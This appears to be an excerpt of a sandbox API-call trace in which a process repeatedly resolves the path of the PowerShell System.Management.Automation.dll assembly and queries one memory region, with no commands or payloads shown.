	[0111.754] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc2f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0111.754] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc240, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0111.754] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc240, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0111.754] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc6b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0111.754] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc600, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0111.754] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc600, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0111.754] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcbda0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0111.754] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcbcf0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0111.754] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcbcf0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0111.754] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc6b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0111.754] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc600, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0111.755] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc600, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0111.755] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc6b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0111.755] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc600, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0111.755] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc600, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0111.755] VirtualQuery (in: lpAddress=0xcb090, lpBuffer=0xcbf50, dwLength=0x30 | out: lpBuffer=0xcbf50*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0111.755] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcbc10, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0111.755] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcbb60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0111.755] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcbb60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0111.756] VirtualQuery (in: lpAddress=0xcb090, lpBuffer=0xcbf50, dwLength=0x30 | out: lpBuffer=0xcbf50*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0111.756] VirtualQuery (in: lpAddress=0xcb120, lpBuffer=0xcbfe0, dwLength=0x30 | out: lpBuffer=0xcbfe0*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0111.756] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcb850, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0111.756] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcb7a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0111.756] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcb7a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0111.756] VirtualQuery (in: lpAddress=0xcb090, lpBuffer=0xcbf50, dwLength=0x30 | out: lpBuffer=0xcbf50*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0111.756] VirtualQuery (in: lpAddress=0xcb120, lpBuffer=0xcbfe0, dwLength=0x30 | out: lpBuffer=0xcbfe0*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0111.757] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcb850, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0111.757] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcb7a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0111.757] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcb7a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0111.757] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcbc10, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0111.757] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcbb60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0111.757] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcbb60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0111.757] VirtualQuery (in: lpAddress=0xcb090, lpBuffer=0xcbf50, dwLength=0x30 | out: lpBuffer=0xcbf50*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0111.757] VirtualQuery (in: lpAddress=0xcb120, lpBuffer=0xcbfe0, dwLength=0x30 | out: lpBuffer=0xcbfe0*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0111.758] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcb850, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0111.758] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcb7a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0111.758] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcb7a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0111.758] VirtualQuery (in: lpAddress=0xcb090, lpBuffer=0xcbf50, dwLength=0x30 | out: lpBuffer=0xcbf50*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0111.758] VirtualQuery (in: lpAddress=0xcb120, lpBuffer=0xcbfe0, dwLength=0x30 | out: lpBuffer=0xcbfe0*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0111.758] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcbc10, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0111.758] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcbb60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0111.758] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcbb60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0111.759] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcbc10, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0111.759] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcbb60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0111.759] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcbb60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0111.759] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcbc10, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0111.759] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcbb60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0111.793] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcbb60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0111.793] VirtualQuery (in: lpAddress=0xcb090, lpBuffer=0xcbf50, dwLength=0x30 | out: lpBuffer=0xcbf50*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0111.794] VirtualQuery (in: lpAddress=0xcb120, lpBuffer=0xcbfe0, dwLength=0x30 | out: lpBuffer=0xcbfe0*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0111.794] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcb850, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0111.794] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcb7a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0111.794] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcb7a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0111.794] VirtualQuery (in: lpAddress=0xcb090, lpBuffer=0xcbf50, dwLength=0x30 | out: lpBuffer=0xcbf50*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0111.795] VirtualQuery (in: lpAddress=0xcb120, lpBuffer=0xcbfe0, dwLength=0x30 | out: lpBuffer=0xcbfe0*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0111.795] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcb850, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0111.795] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcb7a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0111.795] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcb7a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0111.795] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc520, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0111.795] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc470, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0111.795] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc470, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0111.796] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc390, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0111.796] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc2e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0111.796] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc2e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0111.796] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc6b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0111.796] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc600, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0111.796] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc600, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0111.796] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc6b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0111.796] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc600, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0111.796] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc600, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0111.796] VirtualQuery (in: lpAddress=0xcbb30, lpBuffer=0xcc9f0, dwLength=0x30 | out: lpBuffer=0xcc9f0*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
